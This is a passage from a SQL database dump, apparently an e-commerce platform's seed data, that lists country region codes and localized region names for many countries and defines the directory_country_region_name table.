(324, 'FI', 'Pohjois-Savo', 'Pohjois-Savo'),
(325, 'FI', 'Etelä-Savo', 'Etelä-Savo'),
(326, 'FI', 'Etelä-Pohjanmaa', 'Etelä-Pohjanmaa'),
(327, 'FI', 'Pohjanmaa', 'Pohjanmaa'),
(328, 'FI', 'Pirkanmaa', 'Pirkanmaa'),
(329, 'FI', 'Satakunta', 'Satakunta'),
(330, 'FI', 'Keski-Pohjanmaa', 'Keski-Pohjanmaa'),
(331, 'FI', 'Keski-Suomi', 'Keski-Suomi'),
(332, 'FI', 'Varsinais-Suomi', 'Varsinais-Suomi'),
(333, 'FI', 'Etelä-Karjala', 'Etelä-Karjala'),
(334, 'FI', 'Päijät-Häme', 'Päijät-Häme'),
(335, 'FI', 'Kanta-Häme', 'Kanta-Häme'),
(336, 'FI', 'Uusimaa', 'Uusimaa'),
(337, 'FI', 'Itä-Uusimaa', 'Itä-Uusimaa'),
(338, 'FI', 'Kymenlaakso', 'Kymenlaakso'),
(339, 'FI', 'Ahvenanmaa', 'Ahvenanmaa'),
(340, 'EE', 'EE-37', 'Harjumaa'),
(341, 'EE', 'EE-39', 'Hiiumaa'),
(342, 'EE', 'EE-44', 'Ida-Virumaa'),
(343, 'EE', 'EE-49', 'Jõgevamaa'),
(344, 'EE', 'EE-51', 'Järvamaa'),
(345, 'EE', 'EE-57', 'Läänemaa'),
(346, 'EE', 'EE-59', 'Lääne-Virumaa'),
(347, 'EE', 'EE-65', 'Põlvamaa'),
(348, 'EE', 'EE-67', 'Pärnumaa'),
(349, 'EE', 'EE-70', 'Raplamaa'),
(350, 'EE', 'EE-74', 'Saaremaa'),
(351, 'EE', 'EE-78', 'Tartumaa'),
(352, 'EE', 'EE-82', 'Valgamaa'),
(353, 'EE', 'EE-84', 'Viljandimaa'),
(354, 'EE', 'EE-86', 'Võrumaa'),
(355, 'LV', 'LV-DGV', 'Daugavpils'),
(356, 'LV', 'LV-JEL', 'Jelgava'),
(357, 'LV', 'Jēkabpils', 'Jēkabpils'),
(358, 'LV', 'LV-JUR', 'Jūrmala'),
(359, 'LV', 'LV-LPX', 'Liepāja'),
(360, 'LV', 'LV-LE', 'Liepājas novads'),
(361, 'LV', 'LV-REZ', 'Rēzekne'),
(362, 'LV', 'LV-RIX', 'Rīga'),
(363, 'LV', 'LV-RI', 'Rīgas novads'),
(364, 'LV', 'Valmiera', 'Valmiera'),
(365, 'LV', 'LV-VEN', 'Ventspils'),
(366, 'LV', 'Aglonas novads', 'Aglonas novads'),
(367, 'LV', 'LV-AI', 'Aizkraukles novads'),
(368, 'LV', 'Aizputes novads', 'Aizputes novads'),
(369, 'LV', 'Aknīstes novads', 'Aknīstes novads'),
(370, 'LV', 'Alojas novads', 'Alojas novads'),
(371, 'LV', 'Alsungas novads', 'Alsungas novads'),
(372, 'LV', 'LV-AL', 'Alūksnes novads'),
(373, 'LV', 'Amatas novads', 'Amatas novads'),
(374, 'LV', 'Apes novads', 'Apes novads'),
(375, 'LV', 'Auces novads', 'Auces novads'),
(376, 'LV', 'Babītes novads', 'Babītes novads'),
(377, 'LV', 'Baldones novads', 'Baldones novads'),
(378, 'LV', 'Baltinavas novads', 'Baltinavas novads'),
(379, 'LV', 'LV-BL', 'Balvu novads'),
(380, 'LV', 'LV-BU', 'Bauskas novads'),
(381, 'LV', 'Beverīnas novads', 'Beverīnas novads'),
(382, 'LV', 'Brocēnu novads', 'Brocēnu novads'),
(383, 'LV', 'Burtnieku novads', 'Burtnieku novads'),
(384, 'LV', 'Carnikavas novads', 'Carnikavas novads'),
(385, 'LV', 'Cesvaines novads', 'Cesvaines novads'),
(386, 'LV', 'Ciblas novads', 'Ciblas novads'),
(387, 'LV', 'LV-CE', 'Cēsu novads'),
(388, 'LV', 'Dagdas novads', 'Dagdas novads'),
(389, 'LV', 'LV-DA', 'Daugavpils novads'),
(390, 'LV', 'LV-DO', 'Dobeles novads'),
(391, 'LV', 'Dundagas novads', 'Dundagas novads'),
(392, 'LV', 'Durbes novads', 'Durbes novads'),
(393, 'LV', 'Engures novads', 'Engures novads'),
(394, 'LV', 'Garkalnes novads', 'Garkalnes novads'),
(395, 'LV', 'Grobiņas novads', 'Grobiņas novads'),
(396, 'LV', 'LV-GU', 'Gulbenes novads'),
(397, 'LV', 'Iecavas novads', 'Iecavas novads'),
(398, 'LV', 'Ikšķiles novads', 'Ikšķiles novads'),
(399, 'LV', 'Ilūkstes novads', 'Ilūkstes novads'),
(400, 'LV', 'Inčukalna novads', 'Inčukalna novads'),
(401, 'LV', 'Jaunjelgavas novads', 'Jaunjelgavas novads'),
(402, 'LV', 'Jaunpiebalgas novads', 'Jaunpiebalgas novads'),
(403, 'LV', 'Jaunpils novads', 'Jaunpils novads'),
(404, 'LV', 'LV-JL', 'Jelgavas novads'),
(405, 'LV', 'LV-JK', 'Jēkabpils novads'),
(406, 'LV', 'Kandavas novads', 'Kandavas novads'),
(407, 'LV', 'Kokneses novads', 'Kokneses novads'),
(408, 'LV', 'Krimuldas novads', 'Krimuldas novads'),
(409, 'LV', 'Krustpils novads', 'Krustpils novads'),
(410, 'LV', 'LV-KR', 'Krāslavas novads'),
(411, 'LV', 'LV-KU', 'Kuldīgas novads'),
(412, 'LV', 'Kārsavas novads', 'Kārsavas novads'),
(413, 'LV', 'Lielvārdes novads', 'Lielvārdes novads'),
(414, 'LV', 'LV-LM', 'Limbažu novads'),
(415, 'LV', 'Lubānas novads', 'Lubānas novads'),
(416, 'LV', 'LV-LU', 'Ludzas novads'),
(417, 'LV', 'Līgatnes novads', 'Līgatnes novads'),
(418, 'LV', 'Līvānu novads', 'Līvānu novads'),
(419, 'LV', 'LV-MA', 'Madonas novads'),
(420, 'LV', 'Mazsalacas novads', 'Mazsalacas novads'),
(421, 'LV', 'Mālpils novads', 'Mālpils novads'),
(422, 'LV', 'Mārupes novads', 'Mārupes novads'),
(423, 'LV', 'Naukšēnu novads', 'Naukšēnu novads'),
(424, 'LV', 'Neretas novads', 'Neretas novads'),
(425, 'LV', 'Nīcas novads', 'Nīcas novads'),
(426, 'LV', 'LV-OG', 'Ogres novads'),
(427, 'LV', 'Olaines novads', 'Olaines novads'),
(428, 'LV', 'Ozolnieku novads', 'Ozolnieku novads'),
(429, 'LV', 'LV-PR', 'Preiļu novads'),
(430, 'LV', 'Priekules novads', 'Priekules novads'),
(431, 'LV', 'Priekuļu novads', 'Priekuļu novads'),
(432, 'LV', 'Pārgaujas novads', 'Pārgaujas novads'),
(433, 'LV', 'Pāvilostas novads', 'Pāvilostas novads'),
(434, 'LV', 'Pļaviņu novads', 'Pļaviņu novads'),
(435, 'LV', 'Raunas novads', 'Raunas novads'),
(436, 'LV', 'Riebiņu novads', 'Riebiņu novads'),
(437, 'LV', 'Rojas novads', 'Rojas novads'),
(438, 'LV', 'Ropažu novads', 'Ropažu novads'),
(439, 'LV', 'Rucavas novads', 'Rucavas novads'),
(440, 'LV', 'Rugāju novads', 'Rugāju novads'),
(441, 'LV', 'Rundāles novads', 'Rundāles novads'),
(442, 'LV', 'LV-RE', 'Rēzeknes novads'),
(443, 'LV', 'Rūjienas novads', 'Rūjienas novads'),
(444, 'LV', 'Salacgrīvas novads', 'Salacgrīvas novads'),
(445, 'LV', 'Salas novads', 'Salas novads'),
(446, 'LV', 'Salaspils novads', 'Salaspils novads'),
(447, 'LV', 'LV-SA', 'Saldus novads'),
(448, 'LV', 'Saulkrastu novads', 'Saulkrastu novads'),
(449, 'LV', 'Siguldas novads', 'Siguldas novads'),
(450, 'LV', 'Skrundas novads', 'Skrundas novads'),
(451, 'LV', 'Skrīveru novads', 'Skrīveru novads'),
(452, 'LV', 'Smiltenes novads', 'Smiltenes novads'),
(453, 'LV', 'Stopiņu novads', 'Stopiņu novads'),
(454, 'LV', 'Strenču novads', 'Strenču novads'),
(455, 'LV', 'Sējas novads', 'Sējas novads'),
(456, 'LV', 'LV-TA', 'Talsu novads'),
(457, 'LV', 'LV-TU', 'Tukuma novads'),
(458, 'LV', 'Tērvetes novads', 'Tērvetes novads'),
(459, 'LV', 'Vaiņodes novads', 'Vaiņodes novads'),
(460, 'LV', 'LV-VK', 'Valkas novads'),
(461, 'LV', 'LV-VM', 'Valmieras novads'),
(462, 'LV', 'Varakļānu novads', 'Varakļānu novads'),
(463, 'LV', 'Vecpiebalgas novads', 'Vecpiebalgas novads'),
(464, 'LV', 'Vecumnieku novads', 'Vecumnieku novads'),
(465, 'LV', 'LV-VE', 'Ventspils novads'),
(466, 'LV', 'Viesītes novads', 'Viesītes novads'),
(467, 'LV', 'Viļakas novads', 'Viļakas novads'),
(468, 'LV', 'Viļānu novads', 'Viļānu novads'),
(469, 'LV', 'Vārkavas novads', 'Vārkavas novads'),
(470, 'LV', 'Zilupes novads', 'Zilupes novads'),
(471, 'LV', 'Ādažu novads', 'Ādažu novads'),
(472, 'LV', 'Ērgļu novads', 'Ērgļu novads'),
(473, 'LV', 'Ķeguma novads', 'Ķeguma novads'),
(474, 'LV', 'Ķekavas novads', 'Ķekavas novads'),
(475, 'LT', 'LT-AL', 'Alytaus Apskritis'),
(476, 'LT', 'LT-KU', 'Kauno Apskritis'),
(477, 'LT', 'LT-KL', 'Klaipėdos Apskritis'),
(478, 'LT', 'LT-MR', 'Marijampolės Apskritis'),
(479, 'LT', 'LT-PN', 'Panevėžio Apskritis'),
(480, 'LT', 'LT-SA', 'Šiaulių Apskritis'),
(481, 'LT', 'LT-TA', 'Tauragės Apskritis'),
(482, 'LT', 'LT-TE', 'Telšių Apskritis'),
(483, 'LT', 'LT-UT', 'Utenos Apskritis'),
(484, 'LT', 'LT-VL', 'Vilniaus Apskritis'),
(485, 'BR', 'AC', 'Acre'),
(486, 'BR', 'AL', 'Alagoas'),
(487, 'BR', 'AP', 'Amapá'),
(488, 'BR', 'AM', 'Amazonas'),
(489, 'BR', 'BA', 'Bahia'),
(490, 'BR', 'CE', 'Ceará'),
(491, 'BR', 'ES', 'Espírito Santo'),
(492, 'BR', 'GO', 'Goiás'),
(493, 'BR', 'MA', 'Maranhão'),
(494, 'BR', 'MT', 'Mato Grosso'),
(495, 'BR', 'MS', 'Mato Grosso do Sul'),
(496, 'BR', 'MG', 'Minas Gerais'),
(497, 'BR', 'PA', 'Pará'),
(498, 'BR', 'PB', 'Paraíba'),
(499, 'BR', 'PR', 'Paraná'),
(500, 'BR', 'PE', 'Pernambuco'),
(501, 'BR', 'PI', 'Piauí'),
(502, 'BR', 'RJ', 'Rio de Janeiro'),
(503, 'BR', 'RN', 'Rio Grande do Norte'),
(504, 'BR', 'RS', 'Rio Grande do Sul'),
(505, 'BR', 'RO', 'Rondônia'),
(506, 'BR', 'RR', 'Roraima'),
(507, 'BR', 'SC', 'Santa Catarina'),
(508, 'BR', 'SP', 'São Paulo'),
(509, 'BR', 'SE', 'Sergipe'),
(510, 'BR', 'TO', 'Tocantins'),
(511, 'BR', 'DF', 'Distrito Federal'),
(512, 'HR', 'HR-01', 'Zagrebačka županija'),
(513, 'HR', 'HR-02', 'Krapinsko-zagorska županija'),
(514, 'HR', 'HR-03', 'Sisačko-moslavačka županija'),
(515, 'HR', 'HR-04', 'Karlovačka županija'),
(516, 'HR', 'HR-05', 'Varaždinska županija'),
(517, 'HR', 'HR-06', 'Koprivničko-križevačka županija'),
(518, 'HR', 'HR-07', 'Bjelovarsko-bilogorska županija'),
(519, 'HR', 'HR-08', 'Primorsko-goranska županija'),
(520, 'HR', 'HR-09', 'Ličko-senjska županija'),
(521, 'HR', 'HR-10', 'Virovitičko-podravska županija'),
(522, 'HR', 'HR-11', 'Požeško-slavonska županija'),
(523, 'HR', 'HR-12', 'Brodsko-posavska županija'),
(524, 'HR', 'HR-13', 'Zadarska županija'),
(525, 'HR', 'HR-14', 'Osječko-baranjska županija'),
(526, 'HR', 'HR-15', 'Šibensko-kninska županija'),
(527, 'HR', 'HR-16', 'Vukovarsko-srijemska županija'),
(528, 'HR', 'HR-17', 'Splitsko-dalmatinska županija'),
(529, 'HR', 'HR-18', 'Istarska županija'),
(530, 'HR', 'HR-19', 'Dubrovačko-neretvanska županija'),
(531, 'HR', 'HR-20', 'Međimurska županija'),
(532, 'HR', 'HR-21', 'Grad Zagreb'),
(533, 'IN', 'AN', 'Andaman and Nicobar Islands'),
(534, 'IN', 'AP', 'Andhra Pradesh'),
(535, 'IN', 'AR', 'Arunachal Pradesh'),
(536, 'IN', 'AS', 'Assam'),
(537, 'IN', 'BR', 'Bihar'),
(538, 'IN', 'CH', 'Chandigarh'),
(539, 'IN', 'CT', 'Chhattisgarh'),
(540, 'IN', 'DN', 'Dadra and Nagar Haveli'),
(541, 'IN', 'DD', 'Daman and Diu'),
(542, 'IN', 'DL', 'Delhi'),
(543, 'IN', 'GA', 'Goa'),
(544, 'IN', 'GJ', 'Gujarat'),
(545, 'IN', 'HR', 'Haryana'),
(546, 'IN', 'HP', 'Himachal Pradesh'),
(547, 'IN', 'JK', 'Jammu and Kashmir'),
(548, 'IN', 'JH', 'Jharkhand'),
(549, 'IN', 'KA', 'Karnataka'),
(550, 'IN', 'KL', 'Kerala'),
(551, 'IN', 'LD', 'Lakshadweep'),
(552, 'IN', 'MP', 'Madhya Pradesh'),
(553, 'IN', 'MH', 'Maharashtra'),
(554, 'IN', 'MN', 'Manipur'),
(555, 'IN', 'ML', 'Meghalaya'),
(556, 'IN', 'MZ', 'Mizoram'),
(557, 'IN', 'NL', 'Nagaland'),
(558, 'IN', 'OR', 'Odisha'),
(559, 'IN', 'PY', 'Puducherry'),
(560, 'IN', 'PB', 'Punjab'),
(561, 'IN', 'RJ', 'Rajasthan'),
(562, 'IN', 'SK', 'Sikkim'),
(563, 'IN', 'TN', 'Tamil Nadu'),
(564, 'IN', 'TG', 'Telangana'),
(565, 'IN', 'TR', 'Tripura'),
(566, 'IN', 'UP', 'Uttar Pradesh'),
(567, 'IN', 'UT', 'Uttarakhand'),
(568, 'IN', 'WB', 'West Bengal'),
(569, 'AU', 'ACT', 'Australian Capital Territory'),
(570, 'AU', 'NSW', 'New South Wales'),
(571, 'AU', 'VIC', 'Victoria'),
(572, 'AU', 'QLD', 'Queensland'),
(573, 'AU', 'SA', 'South Australia'),
(574, 'AU', 'TAS', 'Tasmania'),
(575, 'AU', 'WA', 'Western Australia'),
(576, 'AU', 'NT', 'Northern Territory'),
(577, 'BE', 'VAN', 'Antwerpen'),
(578, 'BE', 'WBR', 'Brabant wallon'),
(579, 'BE', 'BRU', 'Brussels-Capital Region'),
(580, 'BE', 'WHT', 'Hainaut'),
(581, 'BE', 'VLI', 'Limburg'),
(582, 'BE', 'WLG', 'Liège'),
(583, 'BE', 'WLX', 'Luxembourg'),
(584, 'BE', 'WNA', 'Namur'),
(585, 'BE', 'VOV', 'Oost-Vlaanderen'),
(586, 'BE', 'VBR', 'Vlaams-Brabant'),
(587, 'BE', 'VWV', 'West-Vlaanderen'),
(588, 'CN', 'CN-AH', 'Anhui Sheng'),
(589, 'CN', 'CN-BJ', 'Beijing Shi'),
(590, 'CN', 'CN-CQ', 'Chongqing Shi'),
(591, 'CN', 'CN-FJ', 'Fujian Sheng'),
(592, 'CN', 'CN-GS', 'Gansu Sheng'),
(593, 'CN', 'CN-GD', 'Guangdong Sheng'),
(594, 'CN', 'CN-GX', 'Guangxi Zhuangzu Zizhiqu'),
(595, 'CN', 'CN-GZ', 'Guizhou Sheng'),
(596, 'CN', 'CN-HI', 'Hainan Sheng'),
(597, 'CN', 'CN-HE', 'Hebei Sheng'),
(598, 'CN', 'CN-HL', 'Heilongjiang Sheng'),
(599, 'CN', 'CN-HA', 'Henan Sheng'),
(600, 'CN', 'CN-HK', 'Hong Kong SAR'),
(601, 'CN', 'CN-HB', 'Hubei Sheng'),
(602, 'CN', 'CN-HN', 'Hunan Sheng'),
(603, 'CN', 'CN-JS', 'Jiangsu Sheng'),
(604, 'CN', 'CN-JX', 'Jiangxi Sheng'),
(605, 'CN', 'CN-JL', 'Jilin Sheng'),
(606, 'CN', 'CN-LN', 'Liaoning Sheng'),
(607, 'CN', 'CN-MO', 'Macao SAR'),
(608, 'CN', 'CN-NM', 'Nei Mongol Zizhiqu'),
(609, 'CN', 'CN-NX', 'Ningxia Huizi Zizhiqu'),
(610, 'CN', 'CN-QH', 'Qinghai Sheng'),
(611, 'CN', 'CN-SN', 'Shaanxi Sheng'),
(612, 'CN', 'CN-SD', 'Shandong Sheng'),
(613, 'CN', 'CN-SH', 'Shanghai Shi'),
(614, 'CN', 'CN-SX', 'Shanxi Sheng'),
(615, 'CN', 'CN-SC', 'Sichuan Sheng'),
(616, 'CN', 'CN-TW', 'Taiwan Sheng'),
(617, 'CN', 'CN-TJ', 'Tianjin Shi'),
(618, 'CN', 'CN-XJ', 'Xinjiang Uygur Zizhiqu'),
(619, 'CN', 'CN-XZ', 'Xizang Zizhiqu'),
(620, 'CN', 'CN-YN', 'Yunnan Sheng'),
(621, 'CN', 'CN-ZJ', 'Zhejiang Sheng'),
(622, 'CO', 'CO-AMA', 'Amazonas'),
(623, 'CO', 'CO-ANT', 'Antioquia'),
(624, 'CO', 'CO-ARA', 'Arauca'),
(625, 'CO', 'CO-ATL', 'Atlántico'),
(626, 'CO', 'CO-BOL', 'Bolívar'),
(627, 'CO', 'CO-BOY', 'Boyacá'),
(628, 'CO', 'CO-CAL', 'Caldas'),
(629, 'CO', 'CO-CAQ', 'Caquetá'),
(630, 'CO', 'CO-CAS', 'Casanare'),
(631, 'CO', 'CO-CAU', 'Cauca'),
(632, 'CO', 'CO-CES', 'Cesar'),
(633, 'CO', 'CO-CHO', 'Chocó'),
(634, 'CO', 'CO-COR', 'Córdoba'),
(635, 'CO', 'CO-CUN', 'Cundinamarca'),
(636, 'CO', 'CO-GUA', 'Guainía'),
(637, 'CO', 'CO-GUV', 'Guaviare'),
(638, 'CO', 'CO-HUL', 'Huila'),
(639, 'CO', 'CO-LAG', 'La Guajira'),
(640, 'CO', 'CO-MAG', 'Magdalena'),
(641, 'CO', 'CO-MET', 'Meta'),
(642, 'CO', 'CO-NAR', 'Nariño'),
(643, 'CO', 'CO-NSA', 'Norte de Santander'),
(644, 'CO', 'CO-PUT', 'Putumayo'),
(645, 'CO', 'CO-QUI', 'Quindío'),
(646, 'CO', 'CO-RIS', 'Risaralda'),
(647, 'CO', 'CO-SAP', 'San Andrés y Providencia'),
(648, 'CO', 'CO-SAN', 'Santander'),
(649, 'CO', 'CO-SUC', 'Sucre'),
(650, 'CO', 'CO-TOL', 'Tolima'),
(651, 'CO', 'CO-VAC', 'Valle del Cauca'),
(652, 'CO', 'CO-VAU', 'Vaupés'),
(653, 'CO', 'CO-VID', 'Vichada'),
(654, 'MX', 'AGU', 'Aguascalientes'),
(655, 'MX', 'BCN', 'Baja California'),
(656, 'MX', 'BCS', 'Baja California Sur'),
(657, 'MX', 'CAM', 'Campeche'),
(658, 'MX', 'CHP', 'Chiapas'),
(659, 'MX', 'CHH', 'Chihuahua'),
(660, 'MX', 'CMX', 'Ciudad de México'),
(661, 'MX', 'COA', 'Coahuila'),
(662, 'MX', 'COL', 'Colima'),
(663, 'MX', 'DUR', 'Durango'),
(664, 'MX', 'MEX', 'Estado de México'),
(665, 'MX', 'GUA', 'Guanajuato'),
(666, 'MX', 'GRO', 'Guerrero'),
(667, 'MX', 'HID', 'Hidalgo'),
(668, 'MX', 'JAL', 'Jalisco'),
(669, 'MX', 'MIC', 'Michoacán'),
(670, 'MX', 'MOR', 'Morelos'),
(671, 'MX', 'NAY', 'Nayarit'),
(672, 'MX', 'NLE', 'Nuevo León'),
(673, 'MX', 'OAX', 'Oaxaca'),
(674, 'MX', 'PUE', 'Puebla'),
(675, 'MX', 'QUE', 'Querétaro'),
(676, 'MX', 'ROO', 'Quintana Roo'),
(677, 'MX', 'SLP', 'San Luis Potosí'),
(678, 'MX', 'SIN', 'Sinaloa'),
(679, 'MX', 'SON', 'Sonora'),
(680, 'MX', 'TAB', 'Tabasco'),
(681, 'MX', 'TAM', 'Tamaulipas'),
(682, 'MX', 'TLA', 'Tlaxcala'),
(683, 'MX', 'VER', 'Veracruz'),
(684, 'MX', 'YUC', 'Yucatán'),
(685, 'MX', 'ZAC', 'Zacatecas'),
(686, 'PL', 'PL-02', 'dolnośląskie'),
(687, 'PL', 'PL-04', 'kujawsko-pomorskie'),
(688, 'PL', 'PL-06', 'lubelskie'),
(689, 'PL', 'PL-08', 'lubuskie'),
(690, 'PL', 'PL-10', 'łódzkie'),
(691, 'PL', 'PL-12', 'małopolskie'),
(692, 'PL', 'PL-14', 'mazowieckie'),
(693, 'PL', 'PL-16', 'opolskie'),
(694, 'PL', 'PL-18', 'podkarpackie'),
(695, 'PL', 'PL-20', 'podlaskie'),
(696, 'PL', 'PL-22', 'pomorskie'),
(697, 'PL', 'PL-24', 'śląskie'),
(698, 'PL', 'PL-26', 'świętokrzyskie'),
(699, 'PL', 'PL-28', 'warmińsko-mazurskie'),
(700, 'PL', 'PL-30', 'wielkopolskie'),
(701, 'PL', 'PL-32', 'zachodniopomorskie');

-- --------------------------------------------------------

--
-- Table structure for table `directory_country_region_name`
--

CREATE TABLE `directory_country_region_name` (
  `locale` varchar(8) NOT NULL COMMENT 'Locale',
  `region_id` int(10) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Region ID',
  `name` varchar(255) DEFAULT NULL COMMENT 'Region Name'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Directory Country Region Name';

--
-- Dumping data for table `directory_country_region_name`
--

INSERT INTO `directory_country_region_name` (`locale`, `region_id`, `name`) VALUES
('en_US', 1, 'Alabama'),
('en_US', 2, 'Alaska'),
('en_US', 3, 'American Samoa'),
('en_US', 4, 'Arizona'),
('en_US', 5, 'Arkansas'),
('en_US', 6, 'Armed Forces Africa'),
('en_US', 7, 'Armed Forces Americas'),
('en_US', 8, 'Armed Forces Canada'),
('en_US', 9, 'Armed Forces Europe'),
('en_US', 10, 'Armed Forces Middle East'),
('en_US', 11, 'Armed Forces Pacific'),
('en_US', 12, 'California'),
('en_US', 13, 'Colorado'),
('en_US', 14, 'Connecticut'),
('en_US', 15, 'Delaware'),
('en_US', 16, 'District of Columbia'),
('en_US', 17, 'Federated States Of Micronesia'),
('en_US', 18, 'Florida'),
('en_US', 19, 'Georgia'),
('en_US', 20, 'Guam'),
('en_US', 21, 'Hawaii'),
('en_US', 22, 'Idaho'),
('en_US', 23, 'Illinois'),
('en_US', 24, 'Indiana'),
('en_US', 25, 'Iowa'),
('en_US', 26, 'Kansas'),
('en_US', 27, 'Kentucky'),
('en_US', 28, 'Louisiana'),
('en_US', 29, 'Maine'),
('en_US', 30, 'Marshall Islands'),
('en_US', 31, 'Maryland'),
('en_US', 32, 'Massachusetts'),
('en_US', 33, 'Michigan'),
('en_US', 34, 'Minnesota'),
('en_US', 35, 'Mississippi'),
('en_US', 36, 'Missouri'),
('en_US', 37, 'Montana'),
('en_US', 38, 'Nebraska'),
('en_US', 39, 'Nevada'),
('en_US', 40, 'New Hampshire'),
('en_US', 41, 'New Jersey'),
('en_US', 42, 'New Mexico'),
('en_US', 43, 'New York'),
('en_US', 44, 'North Carolina'),
('en_US', 45, 'North Dakota'),
('en_US', 46, 'Northern Mariana Islands'),
('en_US', 47, 'Ohio'),
('en_US', 48, 'Oklahoma'),
('en_US', 49, 'Oregon'),
('en_US', 50, 'Palau'),
('en_US', 51, 'Pennsylvania'),
('en_US', 52, 'Puerto Rico'),
('en_US', 53, 'Rhode Island'),
('en_US', 54, 'South Carolina'),
('en_US', 55, 'South Dakota'),
('en_US', 56, 'Tennessee'),
('en_US', 57, 'Texas'),
('en_US', 58, 'Utah'),
('en_US', 59, 'Vermont'),
('en_US', 60, 'Virgin Islands'),
('en_US', 61, 'Virginia'),
('en_US', 62, 'Washington'),
('en_US', 63, 'West Virginia'),
('en_US', 64, 'Wisconsin'),
('en_US', 65, 'Wyoming'),
('en_US', 66, 'Alberta'),
('en_US', 67, 'British Columbia'),
('en_US', 68, 'Manitoba'),
('en_US', 69, 'Newfoundland and Labrador'),
('en_US', 70, 'New Brunswick'),
('en_US', 71, 'Nova Scotia'),
('en_US', 72, 'Northwest Territories'),
('en_US', 73, 'Nunavut'),
('en_US', 74, 'Ontario'),
('en_US', 75, 'Prince Edward Island'),
('en_US', 76, 'Quebec'),
('en_US', 77, 'Saskatchewan'),
('en_US', 78, 'Yukon Territory'),
('en_US', 79, 'Niedersachsen'),
('en_US', 80, 'Baden-Württemberg'),
('en_US', 81, 'Bayern'),
('en_US', 82, 'Berlin'),
('en_US', 83, 'Brandenburg'),
('en_US', 84, 'Bremen'),
('en_US', 85, 'Hamburg'),
('en_US', 86, 'Hessen'),
('en_US', 87, 'Mecklenburg-Vorpommern'),
('en_US', 88, 'Nordrhein-Westfalen'),
('en_US', 89, 'Rheinland-Pfalz'),
('en_US', 90, 'Saarland'),
('en_US', 91, 'Sachsen'),
('en_US', 92, 'Sachsen-Anhalt'),
('en_US', 93, 'Schleswig-Holstein'),
('en_US', 94, 'Thüringen'),
('en_US', 95, 'Wien'),
('en_US', 96, 'Niederösterreich'),
('en_US', 97, 'Oberösterreich'),
('en_US', 98, 'Salzburg'),
('en_US', 99, 'Kärnten'),
('en_US', 100, 'Steiermark'),
('en_US', 101, 'Tirol'),
('en_US', 102, 'Burgenland'),
('en_US', 103, 'Vorarlberg'),
('en_US', 104, 'Aargau'),
('en_US', 105, 'Appenzell Innerrhoden'),
('en_US', 106, 'Appenzell Ausserrhoden'),
('en_US', 107, 'Bern'),
('en_US', 108, 'Basel-Landschaft'),
('en_US', 109, 'Basel-Stadt'),
('en_US', 110, 'Freiburg'),
('en_US', 111, 'Genf'),
('en_US', 112, 'Glarus'),
('en_US', 113, 'Graubünden'),
('en_US', 114, 'Jura'),
('en_US', 115, 'Luzern'),
('en_US', 116, 'Neuenburg'),
('en_US', 117, 'Nidwalden'),
('en_US', 118, 'Obwalden'),
('en_US', 119, 'St. Gallen'),
('en_US', 120, 'Schaffhausen'),
('en_US', 121, 'Solothurn'),
('en_US', 122, 'Schwyz'),
('en_US', 123, 'Thurgau'),
('en_US', 124, 'Tessin'),
('en_US', 125, 'Uri'),
('en_US', 126, 'Waadt'),
('en_US', 127, 'Wallis'),
('en_US', 128, 'Zug'),
('en_US', 129, 'Zürich'),
('en_US', 130, 'A Coruña'),
('en_US', 131, 'Alava'),
('en_US', 132, 'Albacete'),
('en_US', 133, 'Alicante'),
('en_US', 134, 'Almeria'),
('en_US', 135, 'Asturias'),
('en_US', 136, 'Avila'),
('en_US', 137, 'Badajoz'),
('en_US', 138, 'Baleares'),
('en_US', 139, 'Barcelona'),
('en_US', 140, 'Burgos'),
('en_US', 141, 'Caceres'),
('en_US', 142, 'Cadiz'),
('en_US', 143, 'Cantabria'),
('en_US', 144, 'Castellon'),
('en_US', 145, 'Ceuta'),
('en_US', 146, 'Ciudad Real'),
('en_US', 147, 'Cordoba'),
('en_US', 148, 'Cuenca'),
('en_US', 149, 'Girona'),
('en_US', 150, 'Granada'),
('en_US', 151, 'Guadalajara'),
('en_US', 152, 'Guipuzcoa'),
('en_US', 153, 'Huelva'),
('en_US', 154, 'Huesca'),
('en_US', 155, 'Jaen'),
('en_US', 156, 'La Rioja'),
('en_US', 157, 'Las Palmas'),
('en_US', 158, 'Leon'),
('en_US', 159, 'Lleida'),
('en_US', 160, 'Lugo'),
('en_US', 161, 'Madrid'),
('en_US', 162, 'Malaga'),
('en_US', 163, 'Melilla'),
('en_US', 164, 'Murcia'),
('en_US', 165, 'Navarra'),
('en_US', 166, 'Ourense'),
('en_US', 167, 'Palencia'),
('en_US', 168, 'Pontevedra'),
('en_US', 169, 'Salamanca'),
('en_US', 170, 'Santa Cruz de Tenerife'),
('en_US', 171, 'Segovia'),
('en_US', 172, 'Sevilla'),
('en_US', 173, 'Soria'),
('en_US', 174, 'Tarragona'),
('en_US', 175, 'Teruel'),
('en_US', 176, 'Toledo'),
('en_US', 177, 'Valencia'),
('en_US', 178, 'Valladolid'),
('en_US', 179, 'Vizcaya'),
('en_US', 180, 'Zamora'),
('en_US', 181, 'Zaragoza'),
('en_US', 182, 'Ain'),
('en_US', 183, 'Aisne'),
('en_US', 184, 'Allier'),
('en_US', 185, 'Alpes-de-Haute-Provence'),
('en_US', 186, 'Hautes-Alpes'),
('en_US', 187, 'Alpes-Maritimes'),
('en_US', 188, 'Ardèche'),
('en_US', 189, 'Ardennes'),
('en_US', 190, 'Ariège'),
('en_US', 191, 'Aube'),
('en_US', 192, 'Aude'),
('en_US', 193, 'Aveyron'),
('en_US', 194, 'Bouches-du-Rhône'),
('en_US', 195, 'Calvados'),
('en_US', 196, 'Cantal'),
('en_US', 197, 'Charente'),
('en_US', 198, 'Charente-Maritime'),
('en_US', 199, 'Cher'),
('en_US', 200, 'Corrèze'),
('en_US', 201, 'Corse-du-Sud'),
('en_US', 202, 'Haute-Corse'),
('en_US', 203, 'Côte-d\'Or'),
('en_US', 204, 'Côtes-d\'Armor'),
('en_US', 205, 'Creuse'),
('en_US', 206, 'Dordogne'),
('en_US', 207, 'Doubs'),
('en_US', 208, 'Drôme'),
('en_US', 209, 'Eure'),
('en_US', 210, 'Eure-et-Loir'),
('en_US', 211, 'Finistère'),
('en_US', 212, 'Gard'),
('en_US', 213, 'Haute-Garonne'),
('en_US', 214, 'Gers'),
('en_US', 215, 'Gironde'),
('en_US', 216, 'Hérault'),
('en_US', 217, 'Ille-et-Vilaine'),
('en_US', 218, 'Indre'),
('en_US', 219, 'Indre-et-Loire'),
('en_US', 220, 'Isère'),
('en_US', 221, 'Jura'),
('en_US', 222, 'Landes'),
('en_US', 223, 'Loir-et-Cher'),
('en_US', 224, 'Loire'),
